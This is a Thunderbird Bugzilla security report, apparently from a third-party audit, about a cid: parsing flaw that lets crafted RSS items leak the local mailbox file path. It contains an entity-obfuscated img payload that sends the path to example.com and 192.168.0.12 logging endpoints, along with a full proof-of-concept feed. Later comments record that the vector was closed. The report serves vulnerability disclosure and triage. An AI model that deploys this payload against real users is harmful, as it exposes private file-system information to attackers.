Closed
Bug 1411713
Opened 7 years ago
Closed 6 years ago
TBE-01-013: RSS Local Path Leak via cid: Parsing Bug
Categories
(MailNews Core :: MIME, defect)
Tracking
(Not tracked)
RESOLVED
WORKSFORME
People
(Reporter: BenB, Unassigned)
Details
(Keywords: csectype-disclosure, privacy, sec-moderate, Whiteboard: [attack vectors closed?])
As described in TBE-01-011, it is possible to influence the created email structure of an RSS feed item. This allows to embed attachments and reference them via the cid: protocol. 4 This protocol handler can reference an attachment via its defined Content-ID header.
Since the RSS feed operates on the local file-system environment, Thunderbird converts a specified cid: handler to the mailbox:/// protocol. This would normally not be a problem as JavaScript is not executed and therefore it is not possible to extract the mailbox:/// URL. However, it was discovered that Thunderbird suffers from the following parsing bug, which allows to leak the mailbox:// URL to an attacker-controlled server.
3
4
https://www.fxsitecompat.com/en-CA/docs/2015/moz-document-support-has-been-dropped/
https://tools.ietf.org/html/rfc2392
Email Body:
<img
src="http://examp&#x
6C;e.com/log.php
;?

cid:aaaaab">
Decoded HTML Entity Payload:
http://example.com/log.php?
Parsed by Thunderbird:
<img src="http://example.com/log.php?
mailbox:///C:/Users/UserNAme/AppData/Roaming/Thunderbird/Profiles/anrhqp9r.pgp/M
ail/Feeds/Feed1?number=1&part=1.1.3&filename=test.html">
Thunderbird will then try to fetch the specified image from the attacker's web server. In doing so, it will leak the local file path to the RSS feed. The following RSS feed contains an example of this behavior. It will reference the injected file attachment, which is then leaked to the attacker's web server.
PoC:
<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0" >
<channel>
<title>Feed1</title>
<link>aaa</link>
<item>
<title>Feed1</title>
<guid isPermaLink="false">myguid>
Content-Type:
multipart/alternative; boundary="------------
2DEE3F98D70BD2C65FBA7373"
MIME-Version: 1.0
Subject: feed1
From:
test@example.com
To: test@example.com

This is a multi-part
message in MIME format.
--------------
2DEE3F98D70BD2C65FBA7373
Content-Type: multipart/related;
boundary="------------A320A96F6639F3C578F35383"


--------------
A320A96F6639F3C578F35383
Content-ID: myself
Content-Type:
text/html
Content-Transfer-Encoding: 7Bit

<img
src="http://192.1&#x
36;8.0.12/log.ph
;p?

cid:aaaaab">
--------------
A320A96F6639F3C578F35383
Content-ID: aaaaab
Content-Type:
image/svg+xml
Content-Transfer-Encoding: 7bit
Content-Disposition:
attachment; filename="test.svg"

a

--------------
A320A96F6639F3C578F35383--

--------------2DEE3F98D70BD2C65FBA7373--





</guid>
</item>
</channel>
</rss>
Email Body:
From - Thu, 28 Sep 2017 14:18:48 +0200
X-Mozilla-Status: 0041
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Received: by localhost; Thu, 28 Sep 2017 14:18:48 +0200
Date: Thu, 28 Sep 2017 14:18:48 +0200
Message-Id: <myguid>
Content-Type: multipart/alternative; boundary="------------
2DEE3F98D70BD2C65FBA7373"
MIME-Version: 1.0
Subject: feed1
From: test@example.com
To: test@example.com
This is a multi-part message in MIME format.
--------------2DEE3F98D70BD2C65FBA7373
Content-Type: multipart/related; boundary="------------A320A96F6639F3C578F35383"
--------------A320A96F6639F3C578F35383
Content-ID: myself
Content-Type: text/html
Content-Transfer-Encoding: 7Bit
<img src="http://192.168.0.12/log.php?
cid:aaaaab">
--------------A320A96F6639F3C578F35383
Content-ID: aaaaab
Content-Type: image/svg+xml
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="test.svg"
a
--------------A320A96F6639F3C578F35383--
--------------2DEE3F98D70BD2C65FBA7373--@localhost.localdomain>
From: Feed1
MIME-Version: 1.0
Subject: Feed1
Content-Transfer-Encoding: 8bit
Content-Base:
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>Feed1</title>
<base href="">
</head>
<body id="msgFeedSummaryBody" selected="false">
Feed1
</body>
</html>
It is recommended to check the parsing code of the cid: protocol and investigate why it does not detect a prepended encoded HTTP URL.
Updated•7 years ago
|
Group: mail-core-security
Reporter | ||
Comment 1•7 years ago
|
||
For the original report as PDF; see bug 1411701.
Bug 1411699 will close the vector for injection of such a crafted eml via feed parsing. However, there are likely numerous ways to hand craft mime structures to break/leak in libmime. This bug belongs to that component imo.
Updated•7 years ago
|
Component: Feed Reader → MIME
Summary: RSS Local Path Leak via cid: Parsing Bug → TBE-01-013: RSS Local Path Leak via cid: Parsing Bug
Updated•6 years ago
|
Whiteboard: [attack vectors closed?]
Comment 3•6 years ago
|
||
alta88, I'm wondering if there is anything specific left to do in this bug, or if it would be better to open new issues for any further attack vectors?
Flags: needinfo?(alta88)
I created a feed file with the PoC part above, adjusting for the wrapping there (it fails as invalid xml), adjusting for missing tags (that the parser fails it on), and a message was stored with a long messageId but no other content. So yes, a new vector needs to be found to exploit the cid, post Bug 1411699.
It would be good to ask cure53 to recheck on the 68 esr version.
Flags: needinfo?(alta88)
Updated•5 years ago
|
Group: mail-core-security
You need to log in
before you can comment on or make changes to this bug.
Description
•